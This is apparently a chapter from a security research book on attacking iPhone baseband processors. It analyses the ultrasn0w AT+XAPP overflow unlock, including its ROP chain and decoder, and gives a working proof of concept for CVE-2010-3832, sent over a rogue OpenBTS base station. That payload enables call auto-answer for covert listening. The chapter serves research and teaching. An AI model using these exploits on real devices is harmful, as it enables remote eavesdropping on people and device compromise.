This section evaluates the attack surface that the baseband processor provides. For local exploits, functions exposed through the AT command interpreter were attacked in soft unlocks, but this is by no means the only way to perform a local attack. Another vector that has been used successfully in the past, in an exploit called JerrySIM, was the interface between the SIM and the baseband processor. Considerable complexity is hidden in this interface, especially given the fact that SIM Application Toolkit (STK) and USIM Application Toolkit (USAT) messages from the SIM need to be parsed and processed. For Qualcomm basebands, the USB stack might be a viable target for local attacks as well. According to mailing list posts on the linux-arm-msm mailing list, it seems that Qualcomm is using a ChipIdea core with the corresponding stack. Interestingly, the baseband firmware for the X-Gold 61x chipset also includes a USB stack; however it does not seem to be accessible from the application processor.
When mapping the attack surface of the cellular stack exposed over the air interface, you start at the lowest layer. Decoders of audio data are a frequent source of memory corruption bugs, even in the domain of GSM stacks. Look carefully and you will be able to find examples of voice codecs that send length fields over the air, which may or may not be trusted by the cellular stack in question. However, the downside of such bugs is that they need an established voice connection as a precondition. Up in the data link layer memory corrupting bugs are possible at this layer as well, however frames are too short (17 bytes) to make exploits easy.
Arriving at the network layer you are overwhelmed by a Smörgåsbord of opportunities. To understand, you have to look at 3GPP 24.008 — this 3GPP specification supersedes GSM specification 04.08 — to see how messages on layer 3 are encoded: Messages can be up to 253 bytes long and encoded in different ways. The designers of this fine standard were apparently influenced by ASN.1: They allow variable-length fields for a wide variety of protocol messages. In a number of cases even entities that are explicitly stated to be of fixed length are encoded in a format that transmits their length over the air, creating ambiguity for the parser. However, this is not the only fruitful area; going even higher in the sublayers of layer 3 you find plenty of opportunities to corrupt memory in implementations in the handling of supplementary data and the parsing of short messages. Last but not least, spatial memory corruptions are not the only kind cellular stacks allow. Rather, the fact that many parts of the GSM stack are driven by explicit, large, and complicated state machines gives implementers a more than sufficient chance of introducing temporal memory corruptions such as use-after-frees into their codebase as well, especially considering the fact that allocations and deallocations of some data structures in these state machines are not necessarily done by the same task.
However, identifying and reproducing temporal memory corruptions without source code or instrumentation for the cellular stack is a hard problem.
Because of the number of functions in the IDA Pro databases of the baseband firmware, performing even a shallow audit of the codebase for memory corruptions will be a humongous task.
A straightforward way to find potential memory corruptions in baseband stacks is by looking for functions that perform memory block transfers such as memcpy(), memmove(), and friends, and investigate which of these functions an attacker can use to obtain sufficient control over the length and/or the destination of the transfer. This task is aided by the fact that assertions are placed all over the codebase that log the filename and the line number (in some cases a message and a result code is included as well) whenever situations crop up that were not expected; these strings are even present in the production versions of the baseband firmware.
This way of auditing was very successful on a number of stacks; however, the vast number of memory copies in the IFX stack transfers constant-length blocks.
A different approach to finding potential memory corruptions is to read the GSM and 3GPP specifications carefully and take note of all messages transmitted that have variable-length elements. For each of these messages, you can then try sending such a message with one or more elements having a length not supported by the specification (this may be larger than the allowed maximum or smaller than a minimum specified) and observing whether a crash is triggered on the device. A number of problems exist with this approach, however. First, although it is easy to fuzz test messages that operate in a “stateless” fashion, such as functions related to Mobility Management, things become trickier if you try to find bugs in the Call Control sublayer, for example. Here certain messages are available only for established calls. Second, you will need to have a fairly complete understanding of the protocol you are trying to fuzz. With GSM this is difficult, as the protocol is distributed across thousands of standard documents, and you might easily miss the relevance of some of them. In fact, as there are several revisions of most standards, you might even miss something if you're not aware of all revisions as you do not know a priori which revision of the GSM standard a certain stack conforms to. Last but not least you will deal with a large number of crashes that turn out to be non-exploitable and it will take you a long time to understand which of your crashes are. In general, meaningful fuzz testing is hard to perform with cellular stacks because the specifications are full of explicitly specified state machines that make many code paths hard to reach.
However, note that the bug — described later in this chapter, CVE-2010-3832 — indeed was found by a procedure that could be called “specification-guided fuzz testing.”
This section examines two examples of memory corruption vulnerabilities that can be used to take control over the baseband. The first one is a local vulnerability that can be exploited through the AT command interpreter. The second one is a vulnerability that can be used with an over-the-air interface to attack vulnerable iPhones remotely by having a rogue base station in its proximity.
The AT+XAPP vulnerability is a classic stack buffer overflow that has been used as one of the injection vectors by the ultrasn0w unlock. It is present in all S-Gold 2 basebands, the X-Gold 608 basebands up to versions 05.13.04 (iPhone 3/3GS) and 06.15.00 (iPad), as well as in the X-Gold 61x baseband in version 01.59.00. The vulnerability was independently discovered by @sherif_hashim, @Oranav, @westbaer, and geohot by testing AT commands for crashes.
Having an easily exploitable local memory corruption is a very useful step before investigating remote vulnerabilities. The following example shows the effect of the PoC trigger on an iPhone 2G running the ICE baseband version 04.05.04_G:
# ./sendmodem ‘AT+XAPP="####################################4444555566667777 PPPP"’ Sending command to modem: AT ------.+ AT OK Sending command to modem: AT+XAPP="####################################4444555566667777PPPP" -.+ # ./sendmodem ‘AT+XLOG’ Sending command to modem: AT -.+ AT OK Sending command to modem: AT+XLOG -........+ AT+XLOG +XGENDATA: "DEV_ICE_MODEM_04.05.04_G " +XLOG: Exception Number: 1 Trap Class: 0xBBBB (HW PREFETCH ABORT TRAP) System Stack: 0xA0086800 [176 DWORDs omitted] 0x00000000 Date: 15.01.2012 Time: 05:47 Register: r0: 0x00000000 r1: 0x00000000 r2: 0xFFFF231C r3: 0xB0101FF9 r4: 0x34343434 r5: 0x35353535 r6: 0x36363636 r7: 0x37373737 r8: 0x00000000 r9: 0xA00028E4 r10: 0xB00AC938 r11: 0xB00B67CC r12: 0xA0114F95 r13: 0xB00B2CF4 r14: 0xA010E97D r15: 0x50505054 SPSR: 0x40000013 DFAR: 0x00000001 DFSR: 0x00000005 OK #
As you can see, this overflow can be used to set registers r4–r7 as well as the program counter. You can easily use this overflow to inject your own code into the baseband.
Here you investigate how the AT+XAPP overflow was used by the ultrasn0w unlock to circumvent the network lock on the iPhone 4.
First you have to understand the logistics of the ultrasn0w package. This unlock works by injecting a dynamic library into the CommCenter process using the MobileSubstrate framework. This dynamic library — after checking that it is talking to a supported version of the baseband software — sends a sequence of AT commands to the baseband processor that exploits the AT+XAPP overflow and places a sequence of payloads there. The final goal is to intercept and change messages sent and received by the so-called SEC thread (func_sec_process) to fake an unlocked state to the rest of the cellular stack communicating. In previous versions of ultrasn0w for the X-Gold 608 chipset, this was achieved by creating a separate Nucleus task that intercepted mailbox messages and replaced them. In the ultrasn0w version for the iPhone 4, a different route is taken: The unlock overwrites parts of ThreadX that are responsible for the interthread communication of the SEC thread. This section covers the tricks used to achieve this; the latest version of ultrasn0w for the iPhone4 is by far the most elaborate unlock in existence, bordering on art.
If you disassemble the dynamic object ultrasn0w.dylib located in /Library/MobileSubstrate/DynamicLibraries on your iPhone after the installation of ultrasn0w, you find an array of pointers to strings called unlock_strings that points to four different instantiations of the at+xapp overflow exploited on the baseband processor. Dissecting these allows you to unravel the unlock and appreciate its level of sophistication.
Here is the initial code injection. Already in the first unlock string sent, you might notice something unexpected; instead of code being injected directly, a ROP chain comprised of a single gadget (0x6014A0F1) is used to stitch together a piece of code at the very high end of memory:
0x00000000 DCD 0x34343434 ; R4 [unused] 0x00000004 DCD 0x35353535 ; R5 [unused] 0x00000008 DCD 0x36363636 ; R6 [unused] 0x0000000C DCD 0x37373737 ; R7 [unused] 0x00000010 DCD 0x6014A0F3 ; POP {R3-R5}, PC 0x00000014 DCD ‘UUUU’ ; R3 [unused] 0x00000018 DCD 0x47804807 ; R4 [code/data] 0x0000001C DCD 0xFFFF1FD0 ; R5 [address] 0x00000020 DCD 0x6014A0F1 ; STR R4, [R5] 0x00000020 ; POP {R3-R5}, PC 0x00000024 DCD ‘UUUU’ ; R3 [unused] 0x00000028 DCD 0xBC0F1C07 ; R4 [code/data] 0x0000002C DCD 0xFFFF1FD4 ; R5 [address] 0x00000030 DCD 0x6014A0F1 ; STR R4, [R5] 0x00000030 ; POP {R3-R5}, PC [...] 0x000000B4 DCD ‘UUUU ; R3 [unused] 0x000000B8 DCD 0x601FD9FC ; R4 [code/data] 0x000000BC DCD 0xFFFF1FF8 ; R5 [address] 0x000000C0 DCD 0x6014A0F1 ; STR R4, [R5] 0x000000C0 ; POP {R3-R5}, PC 0x000000C4 DCD ‘3333’ ; R3 [unused] 0x000000C8 DCD ‘4444’ ; R4 [unused] 0x000000CC DCD ‘5555’ ; R5 [unused] 0x000000D0 DCD 0xFFFF1FD1 ; entry point 0x000000D4 DCD 0xFFFF04D0 ; [2nd stage] R0 (memcpy dst) 0x000000D8 DCD 0x6087A7BC ; [2nd stage] R1 (memcpy src) 0x000000DC DCD 0x1010159 ; [2nd stage] R2 (1st summand of len) 0x000000E0 DCD 0xFEFEFEFF ; [2nd stage] R3 (2nd summand of len)
Each call of the ROP gadget consumes four arguments from the stack that are placed into registers r3-r5 and PC. After 11 words have been written, the execution flow is redirected to the Thumb code created. Following is the disassembly:
0xFFFF1FD0 CODE16 0xFFFF1FD0 07 48 LDR R0, =0x6018135C 0xFFFF1FD2 80 47 BLX R0 ; call disable_ints 0xFFFF1FD4 07 1C MOVS R7, R0 ; preserve CPSR 0xFFFF1FD6 0F BC POP {R0-R3}; get args for memcpy 0xFFFF1FD8 D2 18 ADDS R2, R2, R3 ; fix up length 0xFFFF1FDA 07 4B LDR R3, =0x601FD9FC 0xFFFF1FDC 98 47 BLX R3; call memcpy 0xFFFF1FDE 38 1C MOVS R0, R7; get preserved CPSR 0xFFFF1FE0 04 49 LDR R1, =0x6018136C 0xFFFF1FE2 88 47 BLX R1 ; call restore_cpsr 0xFFFF1FE4 01 49 LDR R1, =0x72883C6C ; for clean… 0xFFFF1FE6 8D 46 MOV SP, R1; continuation 0xFFFF1FE8 48 1A SUBS R0, R1, R1; clear R0 0xFFFF1FEA F0 BD POP {R4-R7,PC} ; no crash, please 0xFFFF1FEA ; --------------------------------------- 0xFFFF1FEC 6C 3C 88 72 new_sp DCD 0x72883C6C; DATA XREF: 0xFFFF1FE4 0xFFFF1FF0 5C 13 18 60 P_disable_ints DCD 0x6018135C; DATA XREF: 0xFFFF1FD0 0xFFFF1FF4 6C 13 18 60 P_restore_cpsr DCD 0x6018136C; DATA XREF: 0xFFFF1FE0 0xFFFF1FF8 FC D9 1F 60 P_memcpy DCD 0x601FD9FC; DATA XREF: 0xFFFF1FDA
This code is a stager routine that copies the code from the remaining unlock string to another area at the top end of the memory. The code in question lives at 0xFFFF04D0 and disassembles as follows:
0xFFFF04D0 detour_0xFFFF04D0 ; detour to ROM 0xFFFF04D0 LDR PC, =0x40736334 0xFFFF04D0 ; -------------------------------------------------- 0xFFFF04D4 CODE16 0xFFFF04D4 org_0xFFFF04D0 DCD 0x40736334 ; DATA XREF: detour_0xFFFF04D0 0xFFFF04D8 ; ----------------------------------------------- 0xFFFF04D8 0xFFFF04D8 decoder_entry 0xFFFF04D8 LDR R0, =0x60FA011F 0xFFFF04DA SUBS R0, #0x80 ; avoid 0 bytes 0xFFFF04DC SUBS R0, #0x80 ; R0 = 0x60FA001F 0xFFFF04DE LDR R2, =0x60701280 0xFFFF04E0 STR R0, [R2] 0xFFFF04E2 ADDS R4, R4, R7 0xFFFF04E4 LDR R0, =0x6018135C 0xFFFF04E6 BLX R0 ; call disable_ints 0xFFFF04E8 MOVS R7, R0 0xFFFF04EA ADDS R2, R5, R6 0xFFFF04EC MOVS R5, 0x22 ; ‘"’ 0xFFFF04F0 0xFFFF04F0 decoder_loop ; CODE XREF: 0xFFFF0508 0xFFFF04F0 LDRB R0, [R4] 0xFFFF04F2 CMP R0, R5 ; check for end of str 0xFFFF04F4 BEQ break_loop 0xFFFF04F6 NOP 0xFFFF04F8 CMP R0, #0xFF ; escape character 0xFFFF04FA BNE non_escaped 0xFFFF04FC ADDS R4, #1 ; skip 0xFF 0xFFFF04FE LDRB R0, [R4] 0xFFFF0500 ADDS R0, #1 0xFFFF0502 0xFFFF0502 non_escaped ; CODE XREF: 0xFFFF04FA 0xFFFF0502 STRB R0, [R2] 0xFFFF0504 ADDS R4, #1 0xFFFF0506 ADDS R2, #1 0xFFFF0508 B decoder_loop 0xFFFF050A ; ------------------------------------------------------ 0xFFFF050A 0xFFFF050A break_loop ; CODE XREF: 0xFFFF04F4 0xFFFF050A MOVS R0, R7 0xFFFF050C LDR R1, =0x6018136C 0xFFFF050E BLX R1 ; call restore_cpsr 0xFFFF0510 SUBS R0, R1, R1 0xFFFF0512 MOV R2, SP 0xFFFF0514 LDR R2, [R2] 0xFFFF0516 BX R2 0xFFFF0516 ; ------------------------------------------------------------------- 0xFFFF0518 dword_FFFF0518 DCD 0x60FA011F ; DATA XREF: decoder_entry 0xFFFF051C dword_FFFF051C DCD 0x60701280 ; DATA XREF: 0xFFFF04DE 0xFFFF0520 P_disable_ints DCD 0x6018135C ; DATA XREF: 0xFFFF04E4 0xFFFF0524 P_restore_cpsr DCD 0x6018136C ; DATA XREF: 0xFFFF050C
Since there was a routine of the ThreadX OS living at the address overwritten by the previous code, the first instruction is a simple detour to a version of the overwritten function in flash. The code starting at 0xFFFF04D8 is a simple decoding function that is used by subsequent at+xapp overflow instantiations to allow for arbitrary payloads; this simple decoder is required if you want to inject binary blobs, as certain bytes such as whitespaces and the zero byte are not allowed to appear in the string passed to at+xapp. The decoder uses r5+r6 as a destination address for the decoded payload and r4+r7 as the source address for the input of the decoder. It works by copying bytes until it hits a quotes character (0x22), regarding 0xff as an escape symbol. If 0xff is found in the input, the byte following it is incremented by one (modulo 256) and copied to the output — with the escape symbol discarded.
This approach raises two questions: Why is a ROP chain needed to inject the decoder and what is so special about the memory space the stager and the decoder were copied to?
The X-Gold 61x introduced a new security feature, namely a strict form of Data Execution Prevention (DEP). All memory regions that are writable lack the execute flag. Furthermore, memory is marked as executable in the early initialization phase, and after this phase the page permissions are locked. There seems to be no way to ever set an execute flag on a writable page after this initialization phase is completed.
On the other hand, you can see native rather than just ROP chains code in the preceding payload. How does that work? It turns out that the DEP armor has a significant chink. ARM CPUs can have first level caches, which are called tightly coupled memory (TCM). The ARM1176 core in the X-Gold 61x has a TCM that it is enabled during initialization:
0x40100054 MOV R0, #0 ; TCM bank 0 0x40100058 MCR p15, 0, R0,c9,c2, 0 ; write TCM selection register 0x4010005C NOP 0x40100060 MOV R0, #1 ; "1 = I/D TCM Region Register accessible in ; Secure and Non-secure worlds." 0x40100064 MCR p15, 0, R0,c9,c1, 2 ; write DTCM non-secure control access ; register 0x40100068 NOP 0x4010006C MCR p15, 0, R0,c9,c1, 3 ; write ITCM non-secure control access ; register 0x40100070 NOP 0x40100074 LDR R1, =0xFFFF000D ; enable ITCM with base address 0xFFFF0000 0x40100078 MCR p15, 0, R1,c9,c1, 1 ; write ITCM region register 0x4010007C NOP 0x40100080 LDR R1, =0xFFFF200D ; enable DTCM with base address 0xFFFF2000 0x40100084 MCR p15, 0, R1,c9,c1, 0 ; write DTCM region register 0x40100088 NOP 0x40100088 ========================== 0x4010008C MOV R0, #1 ; TCM bank 1 0x40100090 MCR p15, 0, R0,c9,c2, 0 ; write TCM selection register 0x40100094 NOP 0x40100098 MOV R0, #1 ; "1 = I/D TCM Region Register accessible in ; Secure and Non-secure worlds." 0x4010009C MCR p15, 0, R0,c9,c1, 2 ; write DTCM non-secure control access register 0x401000A0 NOP 0x401000A4 MCR p15, 0, R0,c9,c1, 3 ; write ITCM non-secure control access register 0x401000A8 NOP 0x401000AC LDR R1, =0xFFFF100D 0x401000B0 MCR p15, 0, R1,c9,c1, 1 ; write ITCM region register 0x401000B4 NOP 0x401000B8 LDR R1, =0xFFFF300D 0x401000BC MCR p15, 0, R1,c9,c1, 0 ; write DTCM region register 0x401000C0 NOP 0x401000C4 BX LR
This explains why the exploit could write to addresses above 0xFFFF0000 and have the CPU execute the written data as code.
To make sense of the second and third at+xapp strings being sent, you first have to understand the last one. We will not give the payload contained in the last unlock string in its entirety, but rather only have a quick look at the meat of it:
0xFFFF0A30 LDR R4, =0x601FD9FC ; memcpy 0xFFFF0A32 LDR R5, =0x60FA0000 ; void *ptr = 0x60FA0000 0xFFFF0A34 LDR R6, =0xFFFF1000 0xFFFF0A36 0xFFFF0A36 tcm_patch_loop ; CODE XREF: sub_FFFF09A8+A2 0xFFFF0A36 LDRH R0, [R5] ; dst_offset = *((uint16_t *) ptr) 0xFFFF0A38 LDRH R2, [R5,#2] ; len = *((uint16_t *) ptr + 2) 0xFFFF0A3A MOVS R7, R2 0xFFFF0A3C CMP R2, #0 ; if (len == 0) 0xFFFF0A3E BEQ tcm_pl_exit ; { goto tcm_pl_exit; } 0xFFFF0A40 ADDS R5, #4 ; ptr += 4 0xFFFF0A42 MOVS R1, R5 0xFFFF0A44 ADDS R0, R0, R6 ; dst = 0xFFFF1000 + dst_offset 0xFFFF0A46 BLX R4 ; memcpy(0xFFFF1000 + dst_offset, ; ptr, len) 0xFFFF0A48 ADDS R5, R5, R7 ; ptr += len 0xFFFF0A4A B tcm_patch_loop 0xFFFF0A4C ; -------------------------------------------------------- 0xFFFF0A4C 0xFFFF0A4C tcm_pl_exit ; CODE XREF: sub_FFFF09A8+96 0xFFFF0A4C LDR R0, =0xFFFF0F78 0xFFFF0A4E ADR R1, sub_FFFF0B54 0xFFFF0A50 MOVS R2, #0xC 0xFFFF0A52 BLX R4 0xFFFF0A54 BL sub_FFFF0A74 0xFFFF0A58 POP {R4-R7} 0xFFFF0A5A MOVS R0, #0 0xFFFF0A5C LDR R3, =0x60186E5D ; stack_cleanup (SP+=0x1C) 0xFFFF0A5E BX R3
The second and third at+xapp strings store a list of memory regions in the TCM to patch in memory at address 0x60FA0000. This list is traversed by the previous code and has a simple format: Each entry of the list has a header consisting of a 16-bit offset field relative to 0xFFFF1000 and a 16-bit length field specifying its length without header. The list is terminated with an entry that has zero in the length field. The following IDAPython script emulates the behavior of the previous native code.
from idc import * ea = 0x60FA0000 dst = 0xFFFF1000 while True: n = Word(ea+2) offset = Word(ea) if n == 0: break print "patching %d bytes at 0x%08x." % (n, dst + offset) ea += 4 for i in range(n): PatchByte(dst+offset+i, Byte(ea+i)) SetColor(dst+offset+i, CIC_ITEM, 0xFFFF00) ea += n
Use the Load Additional Binary File function to load the decoded, concatenated payload of unlock strings two and three to address 0x60FA0000 into an existing IDA Pro database of the stack, then run the preceding script.
Another interesting facet of the payload contained in the last unlock string are the following two functions, for which we give their C representations:
/* 0xFFFF0AB2 */ int replace_addrs_on_stack(uint32_t *start, uint32_t *end, uint32_t match20msb, uint32_t replace_base) { while ( start < end ) { /* this remaps every address pointing to the TCM region on the stack to its flash equivalent. forreal. whoaaa */ if ( *start >> 12 == match20msb >> 12 ) *start = (*start & 0xFFF) + replace_base; ++start; } } /* 0xFFFF07AE */ void replace_addrs_on_all_stacks(void *match20msb, void *replace_base) { thread_ptr = tx_thread_created_ptr; /* [R4] */ /* i is stored in [SP] * tx_thread_created_count is in R7 * thread_ptr is in R4 */ for(i = 0; i < tx_thread_created_count; i++) { replace_addrs_on_stack(thread_ptr->tx_thread_stack_start, thread_ptr->tx_thread_stack_end, match20msb, replace_base) thread_ptr = thread_ptr->next; } }
The replace_addrs_on_all_stacks function is used to correct the addresses of all return addresses on the stacks of all threads. Every return address pointing into the TCM is rewritten to an address in flash memory; these are the memory locations from which the code copied by the scatter-loader into the TCM originates.
The lessons you learned from ultrasn0w will be of great advantage if you choose to develop a remote exploit for the iPhone4.
This section analyzes the CVE-2010-3832 vulnerability and gives a proof-of-concept exploit for it. This vulnerability results from a memory corruption of a buffer due to a missing boundary check on the length of the TMSI in LOCATION UPDATING REQUESTs and TMSI REALLOCATION COMMANDs — functionalities related to Mobility Management. It affects all iOS devices' cellular service running versions prior to iOS 4.2. No interaction with the device is required from the user; the device simply has to come into the range of a malicious base station wishing to exploit this vulnerability.
Here we show you how to trigger this vulnerability and how to leverage the heap corruption to gain control over the program counter. We then show you how to turn on the auto-answer functionality of the iPhone by executing the handler for setting the S0 register. This allows an attacker to turn an iPhone into a remote listening device.
We investigate this bug on an iPhone 2G running iOS 3.1.3 with baseband firmware ICE 04.05.04_G. The description here is the story that was recovered from scattered notes on how the bug was originally found and exploited, modulo some boring dead ends that were removed. We have chosen the iPhone 2G over the more recent iPhone 4 for two reasons: First, because the codebase of the iPhone 2G is much smaller and hence a clean IDB can be obtained much more quickly than for the iPhone 4. Second, for the iPhone 4, this bug has been patched and no known ways exist to downgrade the baseband firmware to a vulnerable version. Contrast this to the case of the iPhone 2G where firmware is completely malleable due to implementation failures in the security checks performed by the bootloader. This means that you can buy any old second-hand iPhone 2G and get your hands dirty in baseband hacking with a publicly known vulnerability; no fear that you've bought a version with the wrong baseband firmware revision, and no lost time and money due to accidental upgrades.
A TMSI REALLOCATION COMMAND with the length of the TMSI extended to 64 bytes neatly triggers the bug. Figure 11.3 shows a GSM layer 3 message containing a TMSI REALLOCATION COMMAND that triggers the bug, displayed via the Wireshark network analyzer.
Unfortunately, the message cannot be directly created with an unmodified version of libmich. As with standards-compliant implementations of the GSM and 3GPP protocols there is no reason to support TMSIs have a length different from four bytes. However, you can easily use libmich to create an appropriate message and modify the TMSI field and length.
First start up OpenBTS, register the iPhone with your network, and initiate a UDP channel for exchanging GSM layer 3 packets with the handset by using the testcall facility of OpenBTS:
OpenBTS> tmsis TMSI IMSI IMEI(SV) age used 0x4f5e0ccc 262XXXXXXXXXXXX 01XXXXXXXXXXXXXX 293s 293s 1 TMSIs in table OpenBTS> testcall 262XXXXXXXXXXXX 60 OpenBTS> calls 1804289383 TI=(1,0) IMSI=262XXXXXXXXXXXX Test from=0 Q.931State=active SIPState= Null (2 sec) 1 transactions in table
You then send this payload using the following small Python script:
#!/usr/bin/python import socket import time import binascii from libmich.formats import * TESTCALL_PORT = 28670 len = 19 lai = 42 hexstr = "051a00f110" hexstr += "%02x%02x%02xfc" % (lai>>8, lai&255, (4*len+1)) hexstr += ‘’.join(‘%02x666666’ % (4*i) for i in range(len)) print "layer3 message to be sent:", hexstr l3msg = binascii.unhexlify(hexstr) print "libmich interprets this as: ", repr(L3Mobile.parse_L3(l3msg)) tcsock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) tcsock.settimeout(1) try: tcsock.sendto(l3msg, (‘127.0.0.1’, TESTCALL_PORT)) reply = tcsock.recv(1024) print "reply received: ", repr(L3Mobile.parse_L3(reply)) except socket.timeout: print "no reply received. potential crash?"
Shortly after executing that script, you lose your signal (the baseband processor resets). The result is a crash log similar to the following on the iPhone, which you can extract using AT+XLOG:
+XLOG: Exception Number: 1 Trap Class: 0xAAAA (HW DATAABORT TRAP) System Stack: 0x6666661C 0x66666630 0x66666644 0xA027CBFC 0xA027CCE4 0x6666665C 0x0000000A 0x6666665C [...] Date: 14.07.2010 Time: 04:58 Register: r0: 0xA027CBFC r1: 0xA027CCE4 r2: 0x6666665C r3: 0x0000000A r4: 0x6666665C r5: 0xA027CCE4 r6: 0x00000001 r7: 0xB0016AA4 r8: 0x00000000 r9: 0xA00028E4 r10: 0xB008E730 r11: 0xB008FE9C r12: 0x45564E54 r13: 0xB008FA8C r14: 0xA0072443 r15: 0xA0026818 SPSR: 0xA0000033 DFAR: 0x6666666C DFSR: 0x00000005
Take a peek at the code producing the preceding exception:
ROM:A002680A FF B5 PUSH {R0-R7,LR} ROM:A002680C 0D 00 MOVS R5, R1 ROM:A002680E 83 B0 SUB SP, SP, #0xC ROM:A0026810 10 69 LDR R0, [R2,#0x10] ; causes HW DATAABORT TRAP ROM:A0026812 14 00 MOVS R4, R2 ROM:A0026814 0D 9A LDR R2, [SP,#0x30+arg_4] ROM:A0026816 0C 99 LDR R1, [SP,#0x30+arg_0] ROM:A0026818 FF F7 6D FB BL sub_A0025EF6 ROM:A002681C A0 69 LDR R0, [R4,#0x18] ROM:A002681E 26 00 MOVS R6, R4
This code is at the beginning of a function called recv_signal() — not the official name, but our choice — that is called from more than 40 tasks and is used for inter-task communication; it receives signals from other tasks. In this case, the link register (r14) was directly called from the main function of the mme:1 task. Moreover, by looking at the pool allocations in the Application_Initialize() routine, you can deduce that the partition allocated was from a pool handing out chunks of 52 bytes.
Despite the crash log showing the program counter (r15) to be 0xA0026818, you can deduce from the Data Fault Address Register (DFAR) and the dump of the other registers that the instruction that caused the fault was the register load from memory at 0xA0026810. Great! This means you can have control over the first argument that is passed to the function sub_A0025EF6(ptr). Disassembling this function shows that this is a mere wrapper around NU_Deallocate_Partition(ptr) that first checks whether ptr == NULL. In case of a NULL pointer it logs an error, otherwise it simply calls NU_Deallocate_Partition(ptr). Looking closer at the implementation of partition memory, you can see that going this route will not be an easy one. In contrast to the dynamic memory implementation, partition memory does not give you an easy write4 primitive because there is no need for coalesced blocks. Other ways exist to exploit control over some of the registers in this scenario, but they are all long-winded and painful.
A simpler way to achieve your goal is to demand control over the program counter! It turns out there is an easy way to achieve that. By increasing the length of the TMSIs by four, and hence the number of overwritten words by one in each try, you quickly arrive at the case of 19 overwritten words:
+XLOG: Exception Number: 1 Trap Class: 0xBBBB (HW PREFETCH ABORT TRAP) System Stack: 0xA006FCA4 0x00000677 0x00000000 0x0000000A 0x00000000 0x00000000 0xB000E720 0xB000E788 Date: 17.07.2010 Time: 21:31 Register: r0: 0x00000000 r1: 0x60000013 r2: 0xFFFF231C r3: 0x00000000 r4: 0x6666665C r5: 0x66666660 r6: 0x66666664 r7: 0xB0016978 r8: 0x00000000 r9: 0xA00028E4 r10: 0xB008E730 r11: 0xB008FE9C r12: 0x45564E54 r13: 0xB008FABC r14: 0xFFFF1360 r15: 0x6666666C SPSR: 0x60000013 DFAR: 0x00000024 DFSR: 0x00000005
Lo and behold, you have gained control over the program counter! Looking around the area referenced by the link register, you see that the function you were supposed to be returning from had no arguments and was called using a BL instruction. To test whether things are working, you try to return to a location that simply does a BX LR. Woohoo, this works as well! No crash log is produced and no signal is lost when you send a message with 0xFFFF058C as the 19th word of the TMSI.
Finally, you take a look at how to turn on auto-answer now. The 3GPP specification 27.007 together with the ITU specification T.250 make implementation of automatic answering of calls after a specified number of rings mandatory. The number of rings is specified in an S register, namely S0 and can be set using the AT command ATS0=n with n being the number of rings; its value can be queried using ATS0?. The contents of the S registers can be stored in NVRAM using AT&W, as a so-called ATC profile. After you have identified a function manipulating this ATC profile using error strings, you can hunt down the functions reading to and writing from NVRAM and figure out the in-memory format of the ATC profile. You then see that the following function get_at_sreg_value is called to query register Sn with k set to zero.
/* 0xA01B9F1B */ uint32_t _fastcall get_at_sreg_base_ptr(uint32_t a1, uint32_t a2) { uint32_t *t1; uint32_t *t2; uint32_t result; t1 = &dword_B01B204C[15 * a1]; t2 = &dword_B01B23D0[17 * a2]; if ( t1[12] ) result = t2[14] + t1[13]; else result = 0; return result; } /* 0xA01C5AB7 */uint32_t _fastcall get_at_sreg_value(uint32_t k, uint32_t n) { return *(get_at_sreg_base_ptr(9, k) + n + 8); }
The plan takes shape: Using the knowledge gained from the previous functions allows you to set the S0 register remotely using a very short program. As a first step, you can write a little assembly program to set the S0 ring counter using the at+xapp overflow. An example looks this:
00000000 <write_ats0_reg>: 0: 2107 movs r1, #7 /* can't load #9 directly (whitespace) */ 2: 1c88 adds r0, r1, #2 /* r0 = 9 */ 4: 1a49 subs r1, r1, r1 /* r1 = 0 */ 6: 47a8 blx r5 /* call 0xA01B9F1B */ 8: 2401 movs r4, #1 a: 7204 strb r4, [r0, #8] /* set S0 = 1 */ c: 1b20 subs r0, r4, r4 /* r0 = 0, indicates ERROR */ e: b00a add sp, #0x28 /* adjust stack pointer */ 10: bd70 pop {r4, r5, r6, pc} /* clean continuation */ 12: 46c0 nop /* nop needed to align to word boundary */
A primitive way to test the above code then is the following:
# printf ‘AT+XAPP="####################################’ > xapp-bin # printf ‘4444x1bx9fx1bxA066667777xF5x2Cx0BxB0’ >> xapp-bin # printf ‘x07x21x88x1cx49x1axa8x47x01x24x04’ >> xapp-bin # printf ‘x72x20x1bx0axb0x70xbdxc0x46"’ >> xapp-bin # ./sendmodem "‘cat xapp-bin‘" Sending command to modem: AT ---.+ AT OK Sending command to modem: AT+XAPP="####################################444466667 777?, ?!?I?G$r p??F" -..+ AT+XAPP="####################################444466667777?, ?!?I?G$r p??F" ERROR # ./sendmodem ‘ATS0?’ Sending command to modem: AT -.+ AT OK Sending command to modem: ATS0? -...+ ATS0? 001 OK #
As you see, the at+xapp payload manages to set the S0 register to one. If you call the iPhone now, it will automatically answer the call after the first ring. Let us now come to the last step and build the payload for switching on this feature remotely.
Modifying the above payload slightly to crash instead of writing the value, you can find out that the S0 register lives at address 0xB002D768 in memory. As an example, you could now use the following gadget to turn on auto-answer remotely:
0xA01EC43C 1C 61 C4 E5 STRB R6, [R4,#0x11C] 0xA01EC440 F0 81 BD E8 LDMFD SP!, {R4-R8,PC}
Note that you need to have continuation of execution after writing the value 1 to the above-mentioned address. Altogether this gives us a single message less than 100 bytes that succinctly demonstrating the exploitability of CVE-2010-3832.
We have given a thorough introduction to baseband attacks against iOS devices. From instilling you with background knowledge on cellular networks, we moved to showing you the inner workings of real-time operating systems running on the baseband chips of the various generations of iOS devices and the intricacies of their heap memory managers.
These rather theoretical aspects were then counterbalanced with a quick-start guide for getting a quick and dirty OpenBTS setup up-and-running. This setup allows you to run your own GSM test network for researching over-the-air baseband attacks in the lab.
We then dissected the actual cellular stacks and discussed their attack surface. We showed you techniques to use to find bugs yourself. Finally, we provided examples of two public vulnerabilities (one local, one remote) and explained the workings of the ultrasn0w unlock.